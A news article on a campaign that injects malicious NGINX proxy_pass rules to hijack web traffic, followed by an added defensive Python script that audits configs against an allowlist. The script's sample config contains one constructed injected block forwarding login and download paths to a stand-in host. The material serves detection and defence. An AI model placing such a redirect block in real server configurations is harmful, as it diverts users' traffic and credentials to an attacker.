Web Traffic Hijacking Campaign Targets NGINX and Baota Panels Using Malicious Configurations

Datadog Security Labs uncovers a sophisticated web‑traffic hijacking operation that abuses NGINX configurations and Baota panels, linked to React2Shell (CVE‑2025‑55182). Learn the attack flow, toolkit components, related reconnaissance, and how to defend your infrastructure.
5 February 2026 by TechStora Editorial Board

Overview of the Campaign

Cybersecurity researchers from Datadog Security Labs have uncovered an active web‑traffic hijacking operation that compromises NGINX installations and popular Chinese hosting panels such as Baota (BT). The attackers intercept legitimate requests and forward them to infrastructure under their control, primarily targeting Asian country‑code TLDs (.in, .id, .pe, .bd, .th) and government/educational domains (.gov, .edu).

Attack Technique – Malicious NGINX Configurations

The threat actors inject crafted location blocks into NGINX configuration files. These blocks capture traffic that matches predefined URL paths and redirect it with the proxy_pass directive to attacker‑owned domains. The technique is linked to the exploitation of React2Shell (CVE‑2025‑55182, CVSS 10.0), which provides a foothold for executing the malicious scripts.

Toolkit Components and Persistence

  • Target‑discovery script that scans for vulnerable NGINX and Baota installations.
  • Persistence module that writes malicious configuration files to survive restarts.
  • Configuration‑generation script that creates the malicious location/proxy_pass rules.
  • Payload retriever that downloads cryptomining binaries from staging servers.
  • Reverse‑shell launcher that connects back to the attacker’s scanner IP.

Related Reconnaissance Activities

In parallel, a coordinated campaign probed Citrix ADC Gateway and NetScaler devices using tens of thousands of residential proxies and a single Microsoft Azure IP (52.139.3[.]76). The operation combined massive login‑panel discovery with a focused version‑disclosure sweep, indicating a broader reconnaissance effort.

Mitigation and Recommendations

  • Apply the React2Shell patch (CVE‑2025‑55182) and keep NGINX up to date.
  • Audit all NGINX location and proxy_pass directives for unauthorized entries.
  • Secure Baota/BT panels with strong credentials and restrict remote access.
  • Deploy a web‑application firewall (WAF) to detect anomalous proxy configurations.
  • Monitor outbound traffic for unexpected connections to unknown domains or IPs.
  • Implement network‑level egress filtering and DNS‑sinkholing for suspicious domains.
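The following Python script is an added example, not code from the article, from Datadog Security Labs or from the campaign toolkit. It implements the audit recommended above against the technique described earlier: it walks an NGINX configuration, attributes every proxy_pass directive to its innermost enclosing location block (nested blocks and one-line blocks included, comments ignored), and reports any target whose host is not on an operator-maintained allowlist. The sample configuration, the allowlist and the hijack-target.invalid host are constructed for the demonstration; a real deployment would run it over nginx.conf plus every file pulled in through include directives (conf.d, sites-enabled, and any panel-managed vhost directories).

```python
import re
import sys
from typing import Dict, List, Optional

# Constructed sample NGINX configuration for the demonstration; it is not taken
# from the article or from the campaign. Two location blocks proxy to internal
# upstreams; the third is the kind of injected block the article describes,
# matching a specific path and forwarding it off-box.
SAMPLE_CONFIG = """
http {
    upstream app_backend { server 10.0.0.5:8080; }
    server {
        listen 80;
        server_name www.example.edu;
        location / {
            proxy_pass http://app_backend;
        }
        # proxy_pass http://commented-out.invalid;   (comments must be ignored)
        location ~ ^/(login|download) {
            proxy_pass http://hijack-target.invalid$request_uri;
        }
        location /api/ {
            proxy_pass http://127.0.0.1:9000/;
        }
    }
}
"""

# Hypothetical allowlist: upstream names and hosts the operator actually deployed.
ALLOWED_UPSTREAMS = {"app_backend", "127.0.0.1", "10.0.0.5"}

# Tokens: an opening brace, a closing brace, a directive ending in ';', or a
# block header (the text immediately before a '{').
TOKEN_RE = re.compile(r"(\{)|(\})|([^{};]+?);|([^{};]+?)(?=\{)")
LOCATION_RE = re.compile(r"^location\s+(.+?)\s*$")


def strip_comments(text: str) -> str:
    """Drop '#' comments so commented-out directives are not reported."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def upstream_host(target: str) -> str:
    """Reduce a proxy_pass argument to its host (or upstream name).

    Drops the scheme, then cuts at the first path, port, query or NGINX
    variable character, so 'http://h.invalid$request_uri' yields 'h.invalid'.
    """
    hostport = re.sub(r"^\w+://", "", target)
    return re.split(r"[/:$?]", hostport, maxsplit=1)[0]


def extract_proxy_targets(config_text: str) -> List[Dict[str, str]]:
    """Return every proxy_pass directive with its innermost enclosing location.

    Walks the config keeping a stack of open blocks, so each proxy_pass is
    attributed to the right location even when blocks are nested or written
    on one line. Files pulled in via 'include' must be scanned separately.
    """
    findings: List[Dict[str, str]] = []
    stack: List[Optional[str]] = []   # location matcher per open block, else None
    pending: Optional[str] = None     # header of the block about to open
    for tok in TOKEN_RE.finditer(strip_comments(config_text)):
        if tok.group(1):                      # '{' opens the pending block
            stack.append(pending)
            pending = None
        elif tok.group(2):                    # '}' closes the innermost block
            if stack:
                stack.pop()
        elif tok.group(3) is not None:        # directive
            parts = tok.group(3).split()
            if len(parts) >= 2 and parts[0] == "proxy_pass":
                location = next((m for m in reversed(stack) if m), "<no location>")
                findings.append({
                    "location": location,
                    "target": parts[1],
                    "host": upstream_host(parts[1]),
                })
        else:                                 # block header
            m = LOCATION_RE.match(tok.group(4).strip())
            pending = m.group(1) if m else None
    return findings


def audit(config_text: str, allowed: set) -> List[Dict[str, str]]:
    """Return the proxy_pass entries whose host is not on the allowlist."""
    return [f for f in extract_proxy_targets(config_text) if f["host"] not in allowed]


if __name__ == "__main__":
    # Pass config file paths to audit them; with no arguments, audit the sample.
    paths = sys.argv[1:]
    texts = [open(p, encoding="utf-8", errors="replace").read() for p in paths] or [SAMPLE_CONFIG]
    for text in texts:
        for f in audit(text, ALLOWED_UPSTREAMS):
            print(f"SUSPICIOUS location {f['location']} -> {f['target']} (host {f['host']})")
```

Run against the sample, the script reports only the injected block: the `/` and `/api/` locations proxy to allowlisted upstreams, while the regex location forwards matching paths to hijack-target.invalid. Comparing against an allowlist rather than a blocklist matters here because the forwarding domains in a campaign like this one change freely; the set of upstreams an operator legitimately configured does not.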